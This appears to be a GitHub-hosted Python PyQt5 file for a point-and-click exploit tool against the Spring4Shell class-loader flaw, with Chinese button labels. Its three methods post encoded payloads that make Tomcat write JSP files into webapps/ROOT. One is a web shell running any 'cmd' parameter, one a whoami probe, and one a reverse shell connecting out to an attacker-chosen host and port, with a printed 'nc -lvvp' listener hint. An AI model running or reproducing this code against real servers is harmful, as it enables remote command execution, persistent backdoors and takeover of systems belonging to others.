-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathmyui.py
223 lines (211 loc) · 15.4 KB
/
myui.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'myui.ui'
#
# Created by: PyQt5 UI code generator 5.9.2
#
# WARNING! All changes made in this file will be lost!
import time
from urllib.parse import urljoin, urlparse
import requests
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(1292, 708)
font = QtGui.QFont()
font.setPointSize(15)
MainWindow.setFont(font)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.radioButton_win = QtWidgets.QRadioButton(self.centralwidget)
self.radioButton_win.setGeometry(QtCore.QRect(770, 230, 201, 91))
font = QtGui.QFont()
font.setPointSize(20)
self.radioButton_win.setFont(font)
self.radioButton_win.setIconSize(QtCore.QSize(50, 50))
self.radioButton_win.setObjectName("radioButton_win")
self.radioButton_linux = QtWidgets.QRadioButton(self.centralwidget)
self.radioButton_linux.setGeometry(QtCore.QRect(980, 250, 201, 61))
font = QtGui.QFont()
font.setPointSize(20)
self.radioButton_linux.setFont(font)
self.radioButton_linux.setObjectName("radioButton_linux")
self.textBrowser_print = QtWidgets.QTextBrowser(self.centralwidget)
self.textBrowser_print.setGeometry(QtCore.QRect(10, 340, 971, 291))
self.textBrowser_print.setObjectName("textBrowser_print")
self.lineEdit_url = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_url.setGeometry(QtCore.QRect(140, 70, 541, 41))
self.lineEdit_url.setObjectName("lineEdit_url")
self.pushButton_insertshell = QtWidgets.QPushButton(self.centralwidget)
self.pushButton_insertshell.setGeometry(QtCore.QRect(30, 160, 171, 51))
font = QtGui.QFont()
font.setPointSize(10)
self.pushButton_insertshell.setFont(font)
self.pushButton_insertshell.setObjectName("pushButton_insertshell")
self.pushButton_insertwhoami = QtWidgets.QPushButton(self.centralwidget)
self.pushButton_insertwhoami.setGeometry(QtCore.QRect(250, 160, 161, 51))
font = QtGui.QFont()
font.setPointSize(10)
self.pushButton_insertwhoami.setFont(font)
self.pushButton_insertwhoami.setObjectName("pushButton_insertwhoami")
self.lineEdit_lhost = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_lhost.setGeometry(QtCore.QRect(900, 40, 320, 41))
self.lineEdit_lhost.setText("")
self.lineEdit_lhost.setObjectName("lineEdit_lhost")
self.pushButton_reverseshell = QtWidgets.QPushButton(self.centralwidget)
self.pushButton_reverseshell.setGeometry(QtCore.QRect(1080, 130, 141, 51))
font = QtGui.QFont()
font.setPointSize(10)
self.pushButton_reverseshell.setFont(font)
self.pushButton_reverseshell.setObjectName("pushButton_reverseshell")
self.lineEdit_lport = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_lport.setGeometry(QtCore.QRect(910, 150, 141, 41))
self.lineEdit_lport.setObjectName("lineEdit_lport")
self.label_url = QtWidgets.QLabel(self.centralwidget)
self.label_url.setGeometry(QtCore.QRect(30, 70, 101, 41))
font = QtGui.QFont()
font.setPointSize(20)
self.label_url.setFont(font)
self.label_url.setObjectName("label_url")
self.label_lhost = QtWidgets.QLabel(self.centralwidget)
self.label_lhost.setGeometry(QtCore.QRect(720, 20, 171, 71))
font = QtGui.QFont()
font.setPointSize(20)
self.label_lhost.setFont(font)
self.label_lhost.setObjectName("label_lhost")
self.label_lport = QtWidgets.QLabel(self.centralwidget)
self.label_lport.setGeometry(QtCore.QRect(720, 130, 171, 71))
font = QtGui.QFont()
font.setPointSize(20)
self.label_lport.setFont(font)
self.label_lport.setObjectName("label_lport")
self.pushButton_del = QtWidgets.QPushButton(self.centralwidget)
self.pushButton_del.setGeometry(QtCore.QRect(20, 290, 111, 41))
self.pushButton_del.setObjectName("pushButton")
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 1292, 32))
self.menubar.setObjectName("menubar")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.radioButton_win.setText(_translate("MainWindow", "windows"))
self.radioButton_linux.setText(_translate("MainWindow", "linux"))
self.pushButton_insertshell.setText(_translate("MainWindow", "插入shell"))
self.pushButton_insertwhoami.setText(_translate("MainWindow", "插入whoami"))
self.pushButton_reverseshell.setText(_translate("MainWindow", "反弹shell"))
self.label_url.setText(_translate("MainWindow", "url:"))
self.label_lhost.setText(_translate("MainWindow", "lhost:"))
self.label_lport.setText(_translate("MainWindow", "lport:"))
self.pushButton_del.setText(_translate("MainWindow", "清空"))
def shell(self):
url = self.lineEdit_url.text()
if url:
headers = {"suffix": "%>//",
"c1": "Runtime",
"c2": "<%",
"DNT": "1",
"Content-Type": "application/x-www-form-urlencoded"
}
nowtime = time.localtime(time.time())
mytime = str(nowtime.tm_year) + "_" + str(nowtime.tm_mon) + "_" + str(nowtime.tm_mday) + "_" + str(
nowtime.tm_hour) + "_" + str(nowtime.tm_min) + "_" + str(nowtime.tm_sec)
shell_name = 'shell_' + mytime
data = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=" + shell_name + "&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
try:
go = requests.post(url, headers=headers, data=data, timeout=15, allow_redirects=False, verify=False)
shellurl = urljoin(urlparse(url).scheme + "://" + urlparse(url).netloc, shell_name + ".jsp")
shellgo = requests.get(shellurl, timeout=15, allow_redirects=False, verify=False)
if shellgo.status_code == 200:
print_text = "[*]" + url + "漏洞存在\n[*]shell地址为:" + shellurl + "?cmd=whoami\n[*]请注意:如需再次检测,需要重启测试的服务器\n"
time.sleep(1)
self.textBrowser_print.insertPlainText(print_text)
else:
print_text = "[*]" + url + "未发现漏洞\n"
self.textBrowser_print.insertPlainText(print_text)
except Exception as e:
print_text = str(e) + "\n"
self.textBrowser_print.insertPlainText(print_text)
pass
else:
print_text = "请输入url\n"
self.textBrowser_print.insertPlainText(print_text)
def whoami(self):
url = self.lineEdit_url.text()
if url:
headers = {"suffix": "%>//",
"c1": "Runtime",
"c2": "<%",
"DNT": "1",
"Content-Type": "application/x-www-form-urlencoded"
}
nowtime = time.localtime(time.time())
mytime = str(nowtime.tm_year) + "_" + str(nowtime.tm_mon) + "_" + str(nowtime.tm_mday) + "_" + str(
nowtime.tm_hour) + "_" + str(nowtime.tm_min) + "_" + str(nowtime.tm_sec)
shell_name = "whoami_" + mytime
data = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(%22whoami%22).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=" + shell_name + "&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
try:
go = requests.post(url, headers=headers, data=data, timeout=15, allow_redirects=False, verify=False)
shellurl = urljoin(urlparse(url).scheme + "://" + urlparse(url).netloc, shell_name + ".jsp")
shellgo = requests.get(shellurl, timeout=15, allow_redirects=False, verify=False)
if shellgo.status_code == 200:
print_text = "[*]" + url + "漏洞存在\n[*]whoami地址为:" + shellurl + "\n[*]请注意:如需再次检测,需要重启测试的服务器\n"
time.sleep(1)
self.textBrowser_print.insertPlainText(print_text)
else:
print_text = "[*]" + url + "未发现漏洞\n"
self.textBrowser_print.insertPlainText(print_text)
except Exception as e:
print_text = str(e) + "\n"
self.textBrowser_print.insertPlainText(print_text)
pass
else:
print_text = "请输入url\n"
self.textBrowser_print.insertPlainText(print_text)
def reverse(self):
headers = {"suffix": "%>//",
"c1": "Runtime",
"c2": "<%",
"DNT": "1",
"Content-Type": "application/x-www-form-urlencoded"
}
url = self.lineEdit_url.text()
lhost = self.lineEdit_lhost.text()
lport = self.lineEdit_lport.text()
if self.radioButton_win.isChecked():
shellpath = "cmd.exe"
if self.radioButton_linux.isChecked():
shellpath = "/bin/sh"
if url and lhost and lport and (self.radioButton_win.isChecked() or self.radioButton_linux.isChecked()):
nowtime = time.localtime(time.time())
mytime = str(nowtime.tm_year) + "_" + str(nowtime.tm_mon) + "_" + str(nowtime.tm_mday) + "_" + str(
nowtime.tm_hour) + "_" + str(nowtime.tm_min) + "_" + str(nowtime.tm_sec)
shellname = "reverse_" + mytime
data = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%40page%20import%3D%22java.lang.*%22%25%7Bsuffix%7Di%0A%25%7Bc2%7Di%40page%20import%3D%22java.util.*%22%25%7Bsuffix%7Di%0A%25%7Bc2%7Di%40page%20import%3D%22java.io.*%22%25%7Bsuffix%7Di%0A%25%7Bc2%7Di%40page%20import%3D%22java.net.*%22%25%7Bsuffix%7Di%0A%0A%25%7Bc2%7Di%0A%20%20class%20StreamConnector%20extends%20Thread%0A%20%20%7B%0A%20%20%20%20InputStream%20ef%3B%0A%20%20%20%20OutputStream%20j0%3B%0A%0A%20%20%20%20StreamConnector(%20InputStream%20ef%2C%20OutputStream%20j0%20)%0A%20%20%20%20%7B%0A%20%20%20%20%20%20this.ef%20%3D%20ef%3B%0A%20%20%20%20%20%20this.j0%20%3D%20j0%3B%0A%20%20%20%20%7D%0A%0A%20%20%20%20public%20void%20run()%0A%20%20%20%20%7B%0A%20%20%20%20%20%20BufferedReader%20t1%20%20%3D%20null%3B%0A%20%20%20%20%20%20BufferedWriter%20cAO%20%3D%20null%3B%0A%20%20%20%20%20%20try%0A%20%20%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20t1%20%20%3D%20new%20BufferedReader(%20new%20InputStreamReader(%20this.ef%20)%20)%3B%0A%20%20%20%20%20%20%20%20cAO%20%3D%20new%20BufferedWriter(%20new%20OutputStreamWriter(%20this.j0%20)%20)%3B%0A%20%20%20%20%20%20%20%20char%20buffer%5B%5D%20%3D%20new%20char%5B8192%5D%3B%0A%20%20%20%20%20%20%20%20int%20length%3B%0A%20%20%20%20%20%20%20%20while(%20(%20length%20%3D%20t1.read(%20buffer%2C%200%2C%20buffer.length%20)%20)%20%3E%200%20)%0A%20%20%20%20%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%20%20cAO.write(%20buffer%2C%200%2C%20length%20)%3B%0A%20%20%20%20%20%20%20%20%20%20cAO.flush()%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%7D%20catch(%20Exception%20e%20)%7B%7D%0A%20%20%20%20%20%20try%0A%20%20%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20if(%20t1%20!%3D%20null%20)%0A%20%20%20%20%20%20%20%20%20%20t1.close()%3B%0A%20%20%20%20%20%20%20%20if(%20cAO%20!%3D%20null%20)%0A%20%20%20%20%20%20%20%20%20%20cAO.close()%3B%0A%20%20%20%20%20%20%7D%20catch(%20Exception%20e%20)%7B%7D%0A%20%20%20%20%7D%0A%20%20%7D%0A%0A%20%20try%0A%20%20%7B%0A%20%20%20%20String%20ShellPath%3B%0A%20%20%20%20ShellPath%20%3D%20new%20String(%22" + shellpath + "%22)%3B%0A%20%20%20%20Socket%20socket%20%3D%20new%20Socket(%20%22" + lhost + "%22%2C%20" + lport + "%20)%3B%0A%20%20%20%20Process%20process%20%3D%20Runtime.getRuntime().exec(%20ShellPath%20)%3B%0A%20%20%20%20(%20new%20StreamConnector(%20process.getInputStream()%2C%20socket.getOutputStream()%20)%20).start()%3B%0A%20%20%20%20(%20new%20StreamConnector(%20socket.getInputStream()%2C%20process.getOutputStream()%20)%20).start()%3B%0A%20%20%7D%20catch(%20Exception%20e%20)%20%7B%7D%0A%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=" + shellname + "&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
try:
go = requests.post(url, headers=headers, data=data, timeout=15, allow_redirects=False, verify=False)
shellurl = urljoin(urlparse(url).scheme + "://" + urlparse(url).netloc, shellname + '.jsp')
print(shellurl)
shellgo = requests.get(shellurl, timeout=15, allow_redirects=True, verify=False)
if shellgo.status_code == 200:
print_text = "[*]" + url + "漏洞存在\n[*]reverse.jsp插入成功,访问:\n" + shellurl + "即可反弹shell\n请在你的" + lhost + "服务器上运行\nnc -lvvp " + lport + "\n[*]请注意:如需再次检测,需要重启测试的服务器\n"
time.sleep(1)
self.textBrowser_print.insertPlainText(print_text)
else:
print_text = "[*]" + url + "未发现漏洞\n"
self.textBrowser_print.insertPlainText(print_text)
except Exception as e:
print_text = str(e) + "\n"
self.textBrowser_print.insertPlainText(print_text)
pass
else:
print_text = "请完整输入参数\n"
self.textBrowser_print.insertPlainText(print_text)
def deltext(self):
self.textBrowser_print.setText("")